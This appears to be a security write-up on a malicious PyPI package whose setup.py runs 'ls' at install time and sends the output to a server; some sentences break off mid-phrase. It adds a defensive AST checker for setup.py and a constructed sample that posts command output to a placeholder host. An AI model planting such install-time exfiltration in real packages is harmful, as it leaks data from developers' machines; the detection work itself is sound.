Our static analysis module flagged the package idodaniel==1.0.3 as suspicious, so we took a deeper look at the code, particularly the statements our technology marked as "risky". On review we found that the package is indeed fishy. Here we discuss our findings.
Our technology-generated report points out a number of "risky" attributes in this package:
- last release was in Nov 2018 (i.e., abandonware),
- homepage points to Google, and
- setup.py uses
Fig 1 shows an excerpt from the setup.py file.
Since setup.py contains code that is executed immediately upon installation of a package, it is clear that the package is trying to communicate with a server during the installation process. As seen in Fig 1, it first executes the
ls command in the background as a separate process and leaks its output to a server over insecure
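As an added illustration of how install-time behaviour like this can be caught before a package reaches a developer's machine, the following checker walks the AST of a setup.py and flags imports and calls that spawn a process or open a network connection. This is example code written for this write-up, not the scanner that produced the report above; the list of flagged modules is an assumption (a small, practical subset), and the two setup.py texts it is run against are constructed samples, not the real package's code.

```python
"""Added example: a minimal AST-based setup.py checker for install-time
process execution and network I/O. Not the original report's tooling."""
import ast
from typing import Dict, List, Tuple

# Assumption: a small, deliberately incomplete list of dotted names whose use
# in setup.py is worth a human look. Real scanners carry a much broader rule set.
PROCESS_PREFIXES = ("subprocess", "os.system", "os.popen", "os.execv", "os.execve",
                    "os.execvp", "os.spawnl", "os.spawnv", "os.fork", "pty.spawn")
NETWORK_PREFIXES = ("urllib", "http.client", "requests", "socket", "ftplib", "smtplib")

Finding = Tuple[int, str, str, str]  # (lineno, "import"|"call", category, dotted name)


def _category(name: str) -> str:
    """Map a fully qualified dotted name to a finding category, or '' if benign."""
    for prefixes, cat in ((PROCESS_PREFIXES, "process-execution"),
                          (NETWORK_PREFIXES, "network")):
        for p in prefixes:
            if name == p or name.startswith(p + "."):
                return cat
    return ""


def _bindings(tree: ast.AST) -> Tuple[Dict[str, str], List[Finding]]:
    """Resolve local names to module paths so aliases cannot hide a call.

    'import subprocess as sp' binds sp -> subprocess; 'from os import system as s'
    binds s -> os.system. Suspicious imports are reported as findings too.
    """
    bound: Dict[str, str] = {}
    findings: List[Finding] = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if alias.asname:
                    bound[alias.asname] = alias.name
                else:  # 'import a.b' binds the name 'a'
                    root = alias.name.split(".")[0]
                    bound[root] = root
                cat = _category(alias.name)
                if cat:
                    findings.append((node.lineno, "import", cat, alias.name))
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            for alias in node.names:
                full = f"{node.module}.{alias.name}"
                bound[alias.asname or alias.name] = full
                cat = _category(full)
                if cat:
                    findings.append((node.lineno, "import", cat, full))
    return bound, findings


def _resolve(func: ast.AST, bound: Dict[str, str]) -> str:
    """Turn the callee of a Call node into a dotted name like 'subprocess.Popen'."""
    parts: List[str] = []
    while isinstance(func, ast.Attribute):
        parts.append(func.attr)
        func = func.value
    if not isinstance(func, ast.Name):
        return ""  # e.g. a call on the result of another call; out of scope here
    parts.append(bound.get(func.id, func.id))
    return ".".join(reversed(parts))


def scan_setup_py(source: str) -> List[Finding]:
    """Return sorted findings (lineno, via, category, name) for a setup.py text."""
    tree = ast.parse(source)
    bound, findings = _bindings(tree)
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = _resolve(node.func, bound)
            cat = _category(name)
            if cat:
                findings.append((node.lineno, "call", cat, name))
    return sorted(findings)


def is_suspicious(source: str) -> bool:
    """True if the setup.py both spawns a process and touches the network."""
    cats = {f[2] for f in scan_setup_py(source)}
    return {"process-execution", "network"} <= cats


# Constructed sample mirroring the behaviour described above (not the real package).
SAMPLE_SETUP_PY = '''\
from setuptools import setup
import subprocess
import urllib.request

# constructed: run a command and ship its output to a placeholder host
out = subprocess.Popen(["ls"], stdout=subprocess.PIPE).communicate()[0]
urllib.request.urlopen("http://example.invalid/collect", data=out)

setup(name="demo", version="0.0.1")
'''

# Constructed benign control: nothing but the setup() call.
BENIGN_SETUP_PY = 'from setuptools import setup\nsetup(name="demo", version="0.0.1")\n'

if __name__ == "__main__":
    for lineno, via, cat, name in scan_setup_py(SAMPLE_SETUP_PY):
        print(f"line {lineno}: {via} {name} [{cat}]")
    print("suspicious:", is_suspicious(SAMPLE_SETUP_PY))
```

The binding step matters: a setup.py that writes `from subprocess import Popen as P` is resolved to `subprocess.Popen` just like the unaliased form, which is the kind of trivial obfuscation a plain grep for `subprocess.` would miss. Dynamic tricks (`__import__`, `getattr`, `exec` of a decoded string) are not covered by this checker and are a reason to treat any such construct in setup.py as a finding in its own right.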
We reported our findings to PyPI maintainers, and they have yanked this package as of Jan, 2022.